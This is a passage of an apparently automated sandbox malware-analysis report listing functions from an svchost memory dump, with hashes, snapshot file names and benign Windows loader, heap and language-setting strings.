                                                                                                                                                                              • Opcode ID: 5a13918bb50c1e8a7f1ee014ad4143285e5002209b6812b8cd388a847f1ecbcd
                                                                                                                                                                              • Instruction ID: 1d6f1c9ac44930d382db9cf99906d1c3ba7680d707ed3285bb73d10c2ff1022d
                                                                                                                                                                              • Opcode Fuzzy Hash: 5a13918bb50c1e8a7f1ee014ad4143285e5002209b6812b8cd388a847f1ecbcd
                                                                                                                                                                              • Instruction Fuzzy Hash: 96D1E075602785EFCB26DF6AC440AAEFBF1FF8A710F088049E4559F652CBB49981CB14
                                                                                                                                                                              Function 0302D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0302D146
                                                                                                                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0302D0CF
                                                                                                                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 0302D196
                                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0302D2C3
                                                                                                                                                                              • @, xrefs: 0302D2AF
                                                                                                                                                                              • @, xrefs: 0302D313
                                                                                                                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0302D262
                                                                                                                                                                              • @, xrefs: 0302D0FD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                              • API String ID: 0-1356375266
                                                                                                                                                                              • Opcode ID: 6aff9b4abd1d1003bf1dc71a9cde4d1bfcb5bb1d37bf9b9b78ea00a75a20f250
                                                                                                                                                                              • Instruction ID: c354da6637cd1d6ea3ee940d7365e6af31db531559f7974c7ac1e1343b975327
                                                                                                                                                                              • Opcode Fuzzy Hash: 6aff9b4abd1d1003bf1dc71a9cde4d1bfcb5bb1d37bf9b9b78ea00a75a20f250
                                                                                                                                                                              • Instruction Fuzzy Hash: F9A19B7190A3559FD360DF24C884B9FBBE8BB84715F004D2EEA989A240D774D908CF92
                                                                                                                                                                              Function 0303ADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                                                                                                                              • API String ID: 0-664215390
                                                                                                                                                                              • Opcode ID: c29788fd34ad46c6239f812ba7ad5808e2df54d8f5233ea9fe22bce6ac3634d4
                                                                                                                                                                              • Instruction ID: 2c30334a6cd56d6b19be4901ba441756fcab1499555e76444ea8058b2b870e92
                                                                                                                                                                              • Opcode Fuzzy Hash: c29788fd34ad46c6239f812ba7ad5808e2df54d8f5233ea9fe22bce6ac3634d4
                                                                                                                                                                              • Instruction Fuzzy Hash: FB32D175E062698BEF61CF18CC94BEEB7BDAF46344F1841EAE449A7250D7719E808F40
                                                                                                                                                                              Function 03049EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • minkernel\ntdll\sxsisol.cpp, xrefs: 03097713, 030978A4
                                                                                                                                                                              • Internal error check failed, xrefs: 03097718, 030978A9
                                                                                                                                                                              • @, xrefs: 03049EE7
                                                                                                                                                                              • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 030976EE
                                                                                                                                                                              • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03097709
                                                                                                                                                                              • Status != STATUS_NOT_FOUND, xrefs: 0309789A
                                                                                                                                                                              • sxsisol_SearchActCtxForDllName, xrefs: 030976DD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                                                                              • API String ID: 0-761764676
                                                                                                                                                                              • Opcode ID: c9470fa040eb049fb2370748e1db2e0e66d8a6707d3a4b49c4e6bd3508fd95fe
                                                                                                                                                                              • Instruction ID: 981be90a95646b624a9960969d7e2134808e3b26f75c8198aa4a549f56b0dacd
                                                                                                                                                                              • Opcode Fuzzy Hash: c9470fa040eb049fb2370748e1db2e0e66d8a6707d3a4b49c4e6bd3508fd95fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 05129D75A01215DFDF24CFA8C881AEEB7F4FF48710F1984AAE849EB241E7359941CB64
                                                                                                                                                                              Function 0303EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                              • API String ID: 0-1109411897
                                                                                                                                                                              • Opcode ID: 3b0d1fd1f07704ca0680317037a7a52f775ad8f7bc0ac9c9ce187ffbc492510e
                                                                                                                                                                              • Instruction ID: 41655ef2425c71216ceda401aff4aa6502c6b9781f1216471d7a82f17601b9f9
                                                                                                                                                                              • Opcode Fuzzy Hash: 3b0d1fd1f07704ca0680317037a7a52f775ad8f7bc0ac9c9ce187ffbc492510e
                                                                                                                                                                              • Instruction Fuzzy Hash: 03A21975E0662A8FDF64DF19CC987ADB7B9AF46304F1442EAD809A7250DB349E85CF00
                                                                                                                                                                              Function 0302F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-523794902
                                                                                                                                                                              • Opcode ID: 3850b26c3bda85a4648b8167c1fa9199b407555f131287f5ecc6364875fd5568
                                                                                                                                                                              • Instruction ID: c38b78fa76bce9c20af8e93c7c9f72d0baf4c738a51a09236476f16e13542cb4
                                                                                                                                                                              • Opcode Fuzzy Hash: 3850b26c3bda85a4648b8167c1fa9199b407555f131287f5ecc6364875fd5568
                                                                                                                                                                              • Instruction Fuzzy Hash: 2342107520A3929FC714EF28C884B6AFBF5FF89244F0849ADE8858B381D734D945CB51
                                                                                                                                                                              Function 0304B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                              • API String ID: 0-122214566
                                                                                                                                                                              • Opcode ID: 7d3117e8511920053ecdc57820405071bbf49d7f7e17f66daa0aae2d26bbd45b
                                                                                                                                                                              • Instruction ID: d4e3e3cf048880577f1abdae1676c937f554fce221f0f11f7e44f459688eb057
                                                                                                                                                                              • Opcode Fuzzy Hash: 7d3117e8511920053ecdc57820405071bbf49d7f7e17f66daa0aae2d26bbd45b
                                                                                                                                                                              • Instruction Fuzzy Hash: 98C14EB1A03315ABDF24DB69C8807BEB7E5AF85700F188479E8859F781E7B4DA44C391
                                                                                                                                                                              Function 030663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-792281065
                                                                                                                                                                              • Opcode ID: 76407946a38a108f5ed9bae41d2270d2bbe2ea17ef18ceb7e08eb9fec7797796
                                                                                                                                                                              • Instruction ID: 0cc449c92972e385953434e43e3ee60f8936641a758e5d9818cfb549888848f2
                                                                                                                                                                              • Opcode Fuzzy Hash: 76407946a38a108f5ed9bae41d2270d2bbe2ea17ef18ceb7e08eb9fec7797796
                                                                                                                                                                              • Instruction Fuzzy Hash: F1915934A03B18ABDB38EF99E844BAEB7A5EF85B14F040528E4106F785D7B59851C7A0
                                                                                                                                                                              Function 03062674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 030A21BF
                                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 030A2178
                                                                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 030A219F
                                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 030A2180
                                                                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 030A2160, 030A219A, 030A21BA
                                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 030A2165
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                              • API String ID: 0-861424205
                                                                                                                                                                              • Opcode ID: 87dad0e730b31197bff9bb59942becce483c3fd66a6ee4d40991e25597564772
                                                                                                                                                                              • Instruction ID: 700d3b0ed54de3d77a6aee8cfacbb53363c671a54a1c541db9b5a44fb90ef445
                                                                                                                                                                              • Opcode Fuzzy Hash: 87dad0e730b31197bff9bb59942becce483c3fd66a6ee4d40991e25597564772
                                                                                                                                                                              • Instruction Fuzzy Hash: 4F310936F83215BBE721CA9D9C41F9FB6BCDBA4E50F054869FA046B145D270DA00C7A1
                                                                                                                                                                              Function 0306C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 030A8177, 030A81EB
                                                                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 030A81E5
                                                                                                                                                                              • LdrpInitializeProcess, xrefs: 0306C6C4
                                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 030A8181, 030A81F5
                                                                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 030A8170
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0306C6C3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                              • API String ID: 0-475462383
                                                                                                                                                                              • Opcode ID: b63f68c606b8195e60f5a8953d3988cdb944f0d77b1f4c19134cd8006da2eed7
                                                                                                                                                                              • Instruction ID: a6558abb29b1cdd9abae7e30a532531a06809cde5b4b928ddc4c0c06a59165e8
                                                                                                                                                                              • Opcode Fuzzy Hash: b63f68c606b8195e60f5a8953d3988cdb944f0d77b1f4c19134cd8006da2eed7
                                                                                                                                                                              • Instruction Fuzzy Hash: 6231F375746705AFD224EF68DD46E6BB7E4EFC4B10F040958F885AF295E620EC04CBA2
                                                                                                                                                                              Function 030B9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                                                                              • API String ID: 0-3127649145
                                                                                                                                                                              • Opcode ID: 819d755d27159146512ecaf3645c1143384460363214a9557390a1337d5ff408
                                                                                                                                                                              • Instruction ID: aee7c5e36bd83a5b7399a5c8c9450fe8bd8997841b5e599d65eeb0c07547d5a4
                                                                                                                                                                              • Opcode Fuzzy Hash: 819d755d27159146512ecaf3645c1143384460363214a9557390a1337d5ff408
                                                                                                                                                                              • Instruction Fuzzy Hash: F7323B75A027199BDB61DF25CC88BDAB7F8FF88300F1045EAE509A7650DB71AA84CF50
                                                                                                                                                                              Function 03049950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                                                                              • API String ID: 0-3393094623
                                                                                                                                                                              • Opcode ID: 5ae41e70bde88351cf78fb2bbb54081c4e13e2eff91bc01d6e5fa5d7afbbb6d1
                                                                                                                                                                              • Instruction ID: 4bcb6670c40c0dfe7f1bce0ecb400252e2bb96e80197783a4f9f79f2ad721649
                                                                                                                                                                              • Opcode Fuzzy Hash: 5ae41e70bde88351cf78fb2bbb54081c4e13e2eff91bc01d6e5fa5d7afbbb6d1
                                                                                                                                                                              • Instruction Fuzzy Hash: 88025AB150A3418FD760CF64C184BABF7E4BF89704F44897EE9998B250D770DA44CB92
                                                                                                                                                                              Function 030551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • WindowsExcludedProcs, xrefs: 0305522A
                                                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 03055352
                                                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 03055247
                                                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 0305542B
                                                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 0305527B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                              • API String ID: 0-258546922
                                                                                                                                                                              • Opcode ID: 3043916f603c695d850900ec80c18e82d8cdb97f4e1f3d9862c18b45fa20689c
                                                                                                                                                                              • Instruction ID: d3a670c5fff728fb91cc23997bdaa614f29bb1a971f3ae026e027ebba76aaaa1
                                                                                                                                                                              • Opcode Fuzzy Hash: 3043916f603c695d850900ec80c18e82d8cdb97f4e1f3d9862c18b45fa20689c
                                                                                                                                                                              • Instruction Fuzzy Hash: C7F14B76D02218EFDF15DF98C980AEFBBF9EF49650F15406AE906AB250D7709E01CB90
                                                                                                                                                                              Function 030B4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                                                                              • API String ID: 0-2518169356
                                                                                                                                                                              • Opcode ID: ee022b7dc2d1703a2a349af3ba5f631aa10e586a325484430b37c6fcf50184f4
                                                                                                                                                                              • Instruction ID: 78b1ec008ab54ec97fa34f6ed83595b298b8afa8dbd48a85112efcd75a2f0c1d
                                                                                                                                                                              • Opcode Fuzzy Hash: ee022b7dc2d1703a2a349af3ba5f631aa10e586a325484430b37c6fcf50184f4
                                                                                                                                                                              • Instruction Fuzzy Hash: 6591D072D1261A9BCB20CF69C881AFEB7F4EF89310F1945A9E810EB350D735DA01CB90
                                                                                                                                                                              Function 0305D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-1975516107
                                                                                                                                                                              • Opcode ID: 10be077bb28bf864af4e373f39ff3d44822cbef693a04c77a6a24479305af37b
                                                                                                                                                                              • Instruction ID: 043190974577d1f05ba0be4749278d239ffa483fbf0f3a6e0fd6bcaf2d32a6e9
                                                                                                                                                                              • Opcode Fuzzy Hash: 10be077bb28bf864af4e373f39ff3d44822cbef693a04c77a6a24479305af37b
                                                                                                                                                                              • Instruction Fuzzy Hash: CD510375A02349DFDB24EFA4C4847EEBBF2FF48314F18455AE8016B291D770A991CB90
                                                                                                                                                                              Function 030276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                              • API String ID: 0-3061284088
                                                                                                                                                                              • Opcode ID: 80de5770758086b31e6b76ccae01c1c28ba2f0f830b7d28f11d8b66a5054c50f
                                                                                                                                                                              • Instruction ID: 178e2b33569a7599ccf2c62b92203e0183e62276ddb19d5d6d6fc08a6505e862
                                                                                                                                                                              • Opcode Fuzzy Hash: 80de5770758086b31e6b76ccae01c1c28ba2f0f830b7d28f11d8b66a5054c50f
                                                                                                                                                                              • Instruction Fuzzy Hash: 0501283611B260EEE22AF319940DF9AFBD4DB82E70F18405AE0544F592CEA89880CA20
                                                                                                                                                                              Function 030470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                                                              • Opcode ID: 2c6698e3b3039f830c9a4d5461e9ee171fdd6813e35280ac4db9a577e086bc52
                                                                                                                                                                              • Instruction ID: e0e0aed767fe6c51dbdd31eb3168c3cffd1def072507e0b6c83ea2093e76b1ba
                                                                                                                                                                              • Opcode Fuzzy Hash: 2c6698e3b3039f830c9a4d5461e9ee171fdd6813e35280ac4db9a577e086bc52
                                                                                                                                                                              • Instruction Fuzzy Hash: 9813BCB0A02615DFDB68CF68C4807ADFBF1BF49704F1885A9D859AB381D735AA41CF90
                                                                                                                                                                              Function 03041070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-3570731704
                                                                                                                                                                              • Opcode ID: d14d6012b9b2d8724026a89aef4c431724ae577aebf76ebf2f04ced9db8142dc
                                                                                                                                                                              • Instruction ID: b9892dea3a93d9e4361baa43708e2659e12f76cba9b57b75825e6e8f5424e4d7
                                                                                                                                                                              • Opcode Fuzzy Hash: d14d6012b9b2d8724026a89aef4c431724ae577aebf76ebf2f04ced9db8142dc
                                                                                                                                                                              • Instruction Fuzzy Hash: 00926BB5A02229CFEB65CF19CC40BA9B7B5BF45314F0981EAD949AB290D7349EC0CF51
                                                                                                                                                                              Function 0304A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03097D03
                                                                                                                                                                              • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03097D56
                                                                                                                                                                              • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03097D39
                                                                                                                                                                              • SsHd, xrefs: 0304A885
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                                                                              • API String ID: 0-2905229100
                                                                                                                                                                              • Opcode ID: 19e451334ea185890289826646bffd7b1cabe86c60be5fc03107ab092ff4dce0
                                                                                                                                                                              • Instruction ID: 68138096667b3e84b5d33d61d122584fbc7bb0b796160104a4058b7d6e2391f2
                                                                                                                                                                              • Opcode Fuzzy Hash: 19e451334ea185890289826646bffd7b1cabe86c60be5fc03107ab092ff4dce0
                                                                                                                                                                              • Instruction Fuzzy Hash: C8D17FB6A422159FDF24CF98D8806ADF7F5FF48710F19406AE845AB341D371EA51CBA0
                                                                                                                                                                              Function 03043D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                                                              • Opcode ID: 5b1e11648d243ab8a065f1172377bf82975248a1216fdfbb92b1930fb81d20c8
                                                                                                                                                                              • Instruction ID: d56efa8fd293008f0d2a094ebfbf2299af4a45f78b46d35a199a680cc01b6915
                                                                                                                                                                              • Opcode Fuzzy Hash: 5b1e11648d243ab8a065f1172377bf82975248a1216fdfbb92b1930fb81d20c8
                                                                                                                                                                              • Instruction Fuzzy Hash: E3E2B0B4A012159FDB64CF6AC490BADFBF1FF49304F1881A9D849AB385D734AA45CF90
                                                                                                                                                                              Function 0303A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
